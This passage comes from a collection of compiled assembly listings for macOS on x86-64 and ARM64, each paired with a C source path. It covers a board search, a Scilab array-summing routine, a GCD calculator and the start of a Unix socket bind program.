movl _searchAnswer.answer_number(%rip), %eax
movl %eax, -4(%rbp)
LBB2_9:
movl -4(%rbp), %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $128, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -116(%rbp)
movl $0, -120(%rbp)
movl $0, -124(%rbp)
movl $0, -120(%rbp)
LBB3_1: ## =>This Loop Header: Depth=1
## Child Loop BB3_3 Depth 2
cmpl $5, -120(%rbp)
jge LBB3_8
## %bb.2: ## in Loop: Header=BB3_1 Depth=1
movl $0, -124(%rbp)
LBB3_3: ## Parent Loop BB3_1 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $5, -124(%rbp)
jge LBB3_6
## %bb.4: ## in Loop: Header=BB3_3 Depth=2
movslq -120(%rbp), %rcx
leaq -112(%rbp), %rax
imulq $20, %rcx, %rcx
addq %rcx, %rax
movslq -124(%rbp), %rcx
movl $0, (%rax,%rcx,4)
## %bb.5: ## in Loop: Header=BB3_3 Depth=2
movl -124(%rbp), %eax
addl $1, %eax
movl %eax, -124(%rbp)
jmp LBB3_3
LBB3_6: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_7
LBB3_7: ## in Loop: Header=BB3_1 Depth=1
movl -120(%rbp), %eax
addl $1, %eax
movl %eax, -120(%rbp)
jmp LBB3_1
LBB3_8:
leaq -112(%rbp), %rdi
xorl %esi, %esi
callq _searchAnswer
movl %eax, -128(%rbp)
movl -128(%rbp), %esi
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB3_10
## %bb.9:
xorl %eax, %eax
addq $128, %rsp
popq %rbp
retq
LBB3_10:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "\342\227\217"
L_.str.1: ## @.str.1
.asciz "\342\226\241"
L_.str.2: ## @.str.2
.asciz "\n"
.zerofill __DATA,__bss,_searchAnswer.answer_number,4,2 ## @searchAnswer.answer_number
L_.str.3: ## @.str.3
.asciz "\n<%d>\n"
L_.str.4: ## @.str.4
.asciz "\n\350\247\243\343\201\256\347\267\217\346\225\260:%d\345\200\213\n"
.subsections_via_symbols
| the_stack_data/325436.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _scilab_rt_champ1_d2i2i2i2i0i2s0_ ; -- Begin function scilab_rt_champ1_d2i2i2i2i0i2s0_
.p2align 2
_scilab_rt_champ1_d2i2i2i2i0i2s0_: ; @scilab_rt_champ1_d2i2i2i2i0i2s0_
.cfi_startproc
; %bb.0:
sub sp, sp, #208
.cfi_def_cfa_offset 208
stp x29, x30, [sp, #192] ; 16-byte Folded Spill
add x29, sp, #192
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
ldr x16, [x29, #16]
ldr w15, [x29, #24]
ldr w14, [x29, #28]
ldr x13, [x29, #32]
ldr w12, [x29, #40]
ldr w11, [x29, #44]
ldr w10, [x29, #48]
ldr x9, [x29, #56]
ldr x8, [x29, #64]
stur w0, [x29, #-4]
stur w1, [x29, #-8]
stur x2, [x29, #-16]
stur w3, [x29, #-20]
stur w4, [x29, #-24]
stur x5, [x29, #-32]
stur w6, [x29, #-36]
stur w7, [x29, #-40]
stur x16, [x29, #-48]
stur w15, [x29, #-52]
stur w14, [x29, #-56]
stur x13, [x29, #-64]
stur w12, [x29, #-68]
stur w11, [x29, #-72]
stur w10, [x29, #-76]
stur x9, [x29, #-88]
str x8, [sp, #96]
ldur w8, [x29, #-8]
; kill: def $x8 killed $w8
str x8, [sp, #24] ; 8-byte Folded Spill
ldur w8, [x29, #-24]
; kill: def $x8 killed $w8
str x8, [sp, #32] ; 8-byte Folded Spill
ldur w8, [x29, #-40]
; kill: def $x8 killed $w8
str x8, [sp, #40] ; 8-byte Folded Spill
ldur w8, [x29, #-56]
; kill: def $x8 killed $w8
str x8, [sp, #48] ; 8-byte Folded Spill
ldur w8, [x29, #-76]
; kill: def $x8 killed $w8
str x8, [sp, #56] ; 8-byte Folded Spill
movi d0, #0000000000000000
str d0, [sp, #80]
str wzr, [sp, #76]
str wzr, [sp, #72]
str wzr, [sp, #68]
str wzr, [sp, #64]
str wzr, [sp, #92]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_3 Depth 2
ldr w8, [sp, #92]
ldur w9, [x29, #-4]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_8
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
str wzr, [sp, #88]
b LBB0_3
LBB0_3: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #88]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_6
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=2
ldr x10, [sp, #24] ; 8-byte Folded Reload
ldur x8, [x29, #-16]
ldrsw x9, [sp, #92]
mul x9, x9, x10
add x8, x8, x9, lsl #3
ldrsw x9, [sp, #88]
ldr d1, [x8, x9, lsl #3]
ldr d0, [sp, #80]
fadd d0, d0, d1
str d0, [sp, #80]
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_3 Depth=2
ldr w8, [sp, #88]
add w8, w8, #1
str w8, [sp, #88]
b LBB0_3
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #92]
add w8, w8, #1
str w8, [sp, #92]
b LBB0_1
LBB0_8:
ldr d0, [sp, #80]
mov x8, sp
str d0, [x8]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
str wzr, [sp, #92]
b LBB0_9
LBB0_9: ; =>This Loop Header: Depth=1
; Child Loop BB0_11 Depth 2
ldr w8, [sp, #92]
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_16
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_9 Depth=1
str wzr, [sp, #88]
b LBB0_11
LBB0_11: ; Parent Loop BB0_9 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #88]
ldur w9, [x29, #-24]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_14
b LBB0_12
LBB0_12: ; in Loop: Header=BB0_11 Depth=2
ldr x10, [sp, #32] ; 8-byte Folded Reload
ldur x8, [x29, #-32]
ldrsw x9, [sp, #92]
mul x9, x9, x10
add x8, x8, x9, lsl #2
ldrsw x9, [sp, #88]
ldr w9, [x8, x9, lsl #2]
ldr w8, [sp, #76]
add w8, w8, w9
str w8, [sp, #76]
b LBB0_13
LBB0_13: ; in Loop: Header=BB0_11 Depth=2
ldr w8, [sp, #88]
add w8, w8, #1
str w8, [sp, #88]
b LBB0_11
LBB0_14: ; in Loop: Header=BB0_9 Depth=1
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_9 Depth=1
ldr w8, [sp, #92]
add w8, w8, #1
str w8, [sp, #92]
b LBB0_9
LBB0_16:
ldr w9, [sp, #76]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
str wzr, [sp, #92]
b LBB0_17
LBB0_17: ; =>This Loop Header: Depth=1
; Child Loop BB0_19 Depth 2
ldr w8, [sp, #92]
ldur w9, [x29, #-36]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_24
b LBB0_18
LBB0_18: ; in Loop: Header=BB0_17 Depth=1
str wzr, [sp, #88]
b LBB0_19
LBB0_19: ; Parent Loop BB0_17 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #88]
ldur w9, [x29, #-40]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_22
b LBB0_20
LBB0_20: ; in Loop: Header=BB0_19 Depth=2
ldr x10, [sp, #40] ; 8-byte Folded Reload
ldur x8, [x29, #-48]
ldrsw x9, [sp, #92]
mul x9, x9, x10
add x8, x8, x9, lsl #2
ldrsw x9, [sp, #88]
ldr w9, [x8, x9, lsl #2]
ldr w8, [sp, #72]
add w8, w8, w9
str w8, [sp, #72]
b LBB0_21
LBB0_21: ; in Loop: Header=BB0_19 Depth=2
ldr w8, [sp, #88]
add w8, w8, #1
str w8, [sp, #88]
b LBB0_19
LBB0_22: ; in Loop: Header=BB0_17 Depth=1
b LBB0_23
LBB0_23: ; in Loop: Header=BB0_17 Depth=1
ldr w8, [sp, #92]
add w8, w8, #1
str w8, [sp, #92]
b LBB0_17
LBB0_24:
ldr w9, [sp, #72]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
str wzr, [sp, #92]
b LBB0_25
LBB0_25: ; =>This Loop Header: Depth=1
; Child Loop BB0_27 Depth 2
ldr w8, [sp, #92]
ldur w9, [x29, #-52]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_32
b LBB0_26
LBB0_26: ; in Loop: Header=BB0_25 Depth=1
str wzr, [sp, #88]
b LBB0_27
LBB0_27: ; Parent Loop BB0_25 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #88]
ldur w9, [x29, #-56]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_30
b LBB0_28
LBB0_28: ; in Loop: Header=BB0_27 Depth=2
ldr x10, [sp, #48] ; 8-byte Folded Reload
ldur x8, [x29, #-64]
ldrsw x9, [sp, #92]
mul x9, x9, x10
add x8, x8, x9, lsl #2
ldrsw x9, [sp, #88]
ldr w9, [x8, x9, lsl #2]
ldr w8, [sp, #68]
add w8, w8, w9
str w8, [sp, #68]
b LBB0_29
LBB0_29: ; in Loop: Header=BB0_27 Depth=2
ldr w8, [sp, #88]
add w8, w8, #1
str w8, [sp, #88]
b LBB0_27
LBB0_30: ; in Loop: Header=BB0_25 Depth=1
b LBB0_31
LBB0_31: ; in Loop: Header=BB0_25 Depth=1
ldr w8, [sp, #92]
add w8, w8, #1
str w8, [sp, #92]
b LBB0_25
LBB0_32:
ldr w9, [sp, #68]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
str x0, [sp, #16] ; 8-byte Folded Spill
bl _printf
ldr x0, [sp, #16] ; 8-byte Folded Reload
ldur w9, [x29, #-68]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
bl _printf
str wzr, [sp, #92]
b LBB0_33
LBB0_33: ; =>This Loop Header: Depth=1
; Child Loop BB0_35 Depth 2
ldr w8, [sp, #92]
ldur w9, [x29, #-72]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_40
b LBB0_34
LBB0_34: ; in Loop: Header=BB0_33 Depth=1
str wzr, [sp, #88]
b LBB0_35
LBB0_35: ; Parent Loop BB0_33 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #88]
ldur w9, [x29, #-76]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_38
b LBB0_36
LBB0_36: ; in Loop: Header=BB0_35 Depth=2
ldr x10, [sp, #56] ; 8-byte Folded Reload
ldur x8, [x29, #-88]
ldrsw x9, [sp, #92]
mul x9, x9, x10
add x8, x8, x9, lsl #2
ldrsw x9, [sp, #88]
ldr w9, [x8, x9, lsl #2]
ldr w8, [sp, #64]
add w8, w8, w9
str w8, [sp, #64]
b LBB0_37
LBB0_37: ; in Loop: Header=BB0_35 Depth=2
ldr w8, [sp, #88]
add w8, w8, #1
str w8, [sp, #88]
b LBB0_35
LBB0_38: ; in Loop: Header=BB0_33 Depth=1
b LBB0_39
LBB0_39: ; in Loop: Header=BB0_33 Depth=1
ldr w8, [sp, #92]
add w8, w8, #1
str w8, [sp, #92]
b LBB0_33
LBB0_40:
ldr w9, [sp, #64]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
ldr x8, [sp, #96]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
ldp x29, x30, [sp, #192] ; 16-byte Folded Reload
add sp, sp, #208
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%f"
l_.str.1: ; @.str.1
.asciz "%d"
l_.str.2: ; @.str.2
.asciz "%s"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _scilab_rt_champ1_d2i2i2i2i0i2s0_ ## -- Begin function scilab_rt_champ1_d2i2i2i2i0i2s0_
.p2align 4, 0x90
_scilab_rt_champ1_d2i2i2i2i0i2s0_: ## @scilab_rt_champ1_d2i2i2i2i0i2s0_
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $112, %rsp
movq 96(%rbp), %rax
movq 88(%rbp), %rax
movl 80(%rbp), %eax
movl 72(%rbp), %eax
movl 64(%rbp), %eax
movq 56(%rbp), %rax
movl 48(%rbp), %eax
movl 40(%rbp), %eax
movq 32(%rbp), %rax
movl 24(%rbp), %eax
movl 16(%rbp), %eax
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movq %rdx, -16(%rbp)
movl %ecx, -20(%rbp)
movl %r8d, -24(%rbp)
movq %r9, -32(%rbp)
movl -8(%rbp), %eax
## kill: def $rax killed $eax
movq %rax, -104(%rbp) ## 8-byte Spill
movl -24(%rbp), %eax
## kill: def $rax killed $eax
movq %rax, -96(%rbp) ## 8-byte Spill
movl 24(%rbp), %eax
## kill: def $rax killed $eax
movq %rax, -88(%rbp) ## 8-byte Spill
movl 48(%rbp), %eax
## kill: def $rax killed $eax
movq %rax, -80(%rbp) ## 8-byte Spill
movl 80(%rbp), %eax
## kill: def $rax killed $eax
movq %rax, -72(%rbp) ## 8-byte Spill
xorps %xmm0, %xmm0
movsd %xmm0, -48(%rbp)
movl $0, -52(%rbp)
movl $0, -56(%rbp)
movl $0, -60(%rbp)
movl $0, -64(%rbp)
movl $0, -36(%rbp)
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_3 Depth 2
movl -36(%rbp), %eax
cmpl -4(%rbp), %eax
jge LBB0_8
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl $0, -40(%rbp)
LBB0_3: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -40(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB0_6
## %bb.4: ## in Loop: Header=BB0_3 Depth=2
movq -104(%rbp), %rdx ## 8-byte Reload
movq -16(%rbp), %rax
movslq -36(%rbp), %rcx
imulq %rdx, %rcx
shlq $3, %rcx
addq %rcx, %rax
movslq -40(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
addsd -48(%rbp), %xmm0
movsd %xmm0, -48(%rbp)
## %bb.5: ## in Loop: Header=BB0_3 Depth=2
movl -40(%rbp), %eax
addl $1, %eax
movl %eax, -40(%rbp)
jmp LBB0_3
LBB0_6: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_7
LBB0_7: ## in Loop: Header=BB0_1 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB0_1
LBB0_8:
movsd -48(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str(%rip), %rdi
movb $1, %al
callq _printf
movl $0, -36(%rbp)
LBB0_9: ## =>This Loop Header: Depth=1
## Child Loop BB0_11 Depth 2
movl -36(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB0_16
## %bb.10: ## in Loop: Header=BB0_9 Depth=1
movl $0, -40(%rbp)
LBB0_11: ## Parent Loop BB0_9 Depth=1
## => This Inner Loop Header: Depth=2
movl -40(%rbp), %eax
cmpl -24(%rbp), %eax
jge LBB0_14
## %bb.12: ## in Loop: Header=BB0_11 Depth=2
movq -96(%rbp), %rdx ## 8-byte Reload
movq -32(%rbp), %rax
movslq -36(%rbp), %rcx
imulq %rdx, %rcx
shlq $2, %rcx
addq %rcx, %rax
movslq -40(%rbp), %rcx
movl (%rax,%rcx,4), %eax
addl -52(%rbp), %eax
movl %eax, -52(%rbp)
## %bb.13: ## in Loop: Header=BB0_11 Depth=2
movl -40(%rbp), %eax
addl $1, %eax
movl %eax, -40(%rbp)
jmp LBB0_11
LBB0_14: ## in Loop: Header=BB0_9 Depth=1
jmp LBB0_15
LBB0_15: ## in Loop: Header=BB0_9 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB0_9
LBB0_16:
movl -52(%rbp), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -36(%rbp)
LBB0_17: ## =>This Loop Header: Depth=1
## Child Loop BB0_19 Depth 2
movl -36(%rbp), %eax
cmpl 16(%rbp), %eax
jge LBB0_24
## %bb.18: ## in Loop: Header=BB0_17 Depth=1
movl $0, -40(%rbp)
LBB0_19: ## Parent Loop BB0_17 Depth=1
## => This Inner Loop Header: Depth=2
movl -40(%rbp), %eax
cmpl 24(%rbp), %eax
jge LBB0_22
## %bb.20: ## in Loop: Header=BB0_19 Depth=2
movq -88(%rbp), %rdx ## 8-byte Reload
movq 32(%rbp), %rax
movslq -36(%rbp), %rcx
imulq %rdx, %rcx
shlq $2, %rcx
addq %rcx, %rax
movslq -40(%rbp), %rcx
movl (%rax,%rcx,4), %eax
addl -56(%rbp), %eax
movl %eax, -56(%rbp)
## %bb.21: ## in Loop: Header=BB0_19 Depth=2
movl -40(%rbp), %eax
addl $1, %eax
movl %eax, -40(%rbp)
jmp LBB0_19
LBB0_22: ## in Loop: Header=BB0_17 Depth=1
jmp LBB0_23
LBB0_23: ## in Loop: Header=BB0_17 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB0_17
LBB0_24:
movl -56(%rbp), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -36(%rbp)
LBB0_25: ## =>This Loop Header: Depth=1
## Child Loop BB0_27 Depth 2
movl -36(%rbp), %eax
cmpl 40(%rbp), %eax
jge LBB0_32
## %bb.26: ## in Loop: Header=BB0_25 Depth=1
movl $0, -40(%rbp)
LBB0_27: ## Parent Loop BB0_25 Depth=1
## => This Inner Loop Header: Depth=2
movl -40(%rbp), %eax
cmpl 48(%rbp), %eax
jge LBB0_30
## %bb.28: ## in Loop: Header=BB0_27 Depth=2
movq -80(%rbp), %rdx ## 8-byte Reload
movq 56(%rbp), %rax
movslq -36(%rbp), %rcx
imulq %rdx, %rcx
shlq $2, %rcx
addq %rcx, %rax
movslq -40(%rbp), %rcx
movl (%rax,%rcx,4), %eax
addl -60(%rbp), %eax
movl %eax, -60(%rbp)
## %bb.29: ## in Loop: Header=BB0_27 Depth=2
movl -40(%rbp), %eax
addl $1, %eax
movl %eax, -40(%rbp)
jmp LBB0_27
LBB0_30: ## in Loop: Header=BB0_25 Depth=1
jmp LBB0_31
LBB0_31: ## in Loop: Header=BB0_25 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB0_25
LBB0_32:
movl -60(%rbp), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movl 64(%rbp), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -36(%rbp)
LBB0_33: ## =>This Loop Header: Depth=1
## Child Loop BB0_35 Depth 2
movl -36(%rbp), %eax
cmpl 72(%rbp), %eax
jge LBB0_40
## %bb.34: ## in Loop: Header=BB0_33 Depth=1
movl $0, -40(%rbp)
LBB0_35: ## Parent Loop BB0_33 Depth=1
## => This Inner Loop Header: Depth=2
movl -40(%rbp), %eax
cmpl 80(%rbp), %eax
jge LBB0_38
## %bb.36: ## in Loop: Header=BB0_35 Depth=2
movq -72(%rbp), %rdx ## 8-byte Reload
movq 88(%rbp), %rax
movslq -36(%rbp), %rcx
imulq %rdx, %rcx
shlq $2, %rcx
addq %rcx, %rax
movslq -40(%rbp), %rcx
movl (%rax,%rcx,4), %eax
addl -64(%rbp), %eax
movl %eax, -64(%rbp)
## %bb.37: ## in Loop: Header=BB0_35 Depth=2
movl -40(%rbp), %eax
addl $1, %eax
movl %eax, -40(%rbp)
jmp LBB0_35
LBB0_38: ## in Loop: Header=BB0_33 Depth=1
jmp LBB0_39
LBB0_39: ## in Loop: Header=BB0_33 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB0_33
LBB0_40:
movl -64(%rbp), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movq 96(%rbp), %rsi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
addq $112, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%f"
L_.str.1: ## @.str.1
.asciz "%d"
L_.str.2: ## @.str.2
.asciz "%s"
.subsections_via_symbols
| the_stack_data/1122624.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #16
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
str x0, [sp, #32] ; 8-byte Folded Spill
bl _scanf
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
ldr x0, [sp, #32] ; 8-byte Folded Reload
mov x9, sp
sub x8, x29, #20
str x8, [x9]
bl _scanf
ldur w8, [x29, #-16]
stur w8, [x29, #-8]
ldur w8, [x29, #-20]
stur w8, [x29, #-12]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-8]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB0_7
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-8]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-8]
ldur w9, [x29, #-12]
subs w8, w8, w9
stur w8, [x29, #-8]
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
subs w8, w8, w9
stur w8, [x29, #-12]
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
b LBB0_1
LBB0_7:
ldur w8, [x29, #-8]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB0_9
b LBB0_8
LBB0_8:
ldur w8, [x29, #-16]
; implicit-def: $x11
mov x11, x8
ldur w8, [x29, #-20]
; implicit-def: $x10
mov x10, x8
ldur w9, [x29, #-8]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x11, [x9]
str x10, [x9, #8]
str x8, [x9, #16]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
b LBB0_9
LBB0_9:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Enter First Integer: "
l_.str.1: ; @.str.1
.asciz "%d"
l_.str.2: ; @.str.2
.asciz "Enter Second Integer: "
l_.str.3: ; @.str.3
.asciz "GCD of %d and %d is = %d"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -16(%rbp), %rsi
movb $0, %al
callq _scanf
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -20(%rbp), %rsi
movb $0, %al
callq _scanf
movl -16(%rbp), %eax
movl %eax, -8(%rbp)
movl -20(%rbp), %eax
movl %eax, -12(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movl -8(%rbp), %eax
cmpl -12(%rbp), %eax
je LBB0_7
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl -8(%rbp), %eax
cmpl -12(%rbp), %eax
jle LBB0_4
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -8(%rbp), %eax
subl -12(%rbp), %eax
movl %eax, -8(%rbp)
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
movl -12(%rbp), %eax
cmpl -8(%rbp), %eax
jle LBB0_6
## %bb.5: ## in Loop: Header=BB0_1 Depth=1
movl -12(%rbp), %eax
subl -8(%rbp), %eax
movl %eax, -12(%rbp)
LBB0_6: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_1
LBB0_7:
movl -8(%rbp), %eax
cmpl -12(%rbp), %eax
jne LBB0_9
## %bb.8:
movl -16(%rbp), %esi
movl -20(%rbp), %edx
movl -8(%rbp), %ecx
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
LBB0_9:
movl -4(%rbp), %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Enter First Integer: "
L_.str.1: ## @.str.1
.asciz "%d"
L_.str.2: ## @.str.2
.asciz "Enter Second Integer: "
L_.str.3: ## @.str.3
.asciz "GCD of %d and %d is = %d"
.subsections_via_symbols
| the_stack_data/34355.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #208
.cfi_def_cfa_offset 208
stp x29, x30, [sp, #192] ; 16-byte Folded Spill
add x29, sp, #192
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str wzr, [sp, #72]
str w0, [sp, #68]
str x1, [sp, #56]
ldr w8, [sp, #68]
subs w8, w8, #2
cset w8, eq
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
ldr x8, [sp, #56]
ldr x8, [x8]
mov x9, sp
str x8, [x9]
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
LBB0_2:
ldr x8, [sp, #56]
ldr x8, [x8, #8]
str x8, [sp, #40]
mov x3, #104
str x3, [sp, #32]
add x8, sp, #78
str x8, [sp, #24] ; 8-byte Folded Spill
add x0, x8, #2
ldr x1, [sp, #40]
ldr x8, [sp, #32]
subs x2, x8, #1
bl ___strncpy_chk
ldr x8, [sp, #24] ; 8-byte Folded Reload
add x8, x8, #2
ldr x9, [sp, #32]
subs x9, x9, #1
add x8, x8, x9
strb wzr, [x8]
mov w8, #1
strb w8, [sp, #79]
mov w0, #1
mov w1, #2
mov w2, #0
bl _socket
str w0, [sp, #52]
adds w8, w0, #1
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _perror
mov w8, #1
str w8, [sp, #72]
b LBB0_9
LBB0_4:
ldr w0, [sp, #52]
add x1, sp, #78
mov w2, #106
bl _bind
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5:
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _perror
mov w8, #1
str w8, [sp, #72]
b LBB0_9
LBB0_6:
ldr w0, [sp, #52]
bl _close
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7:
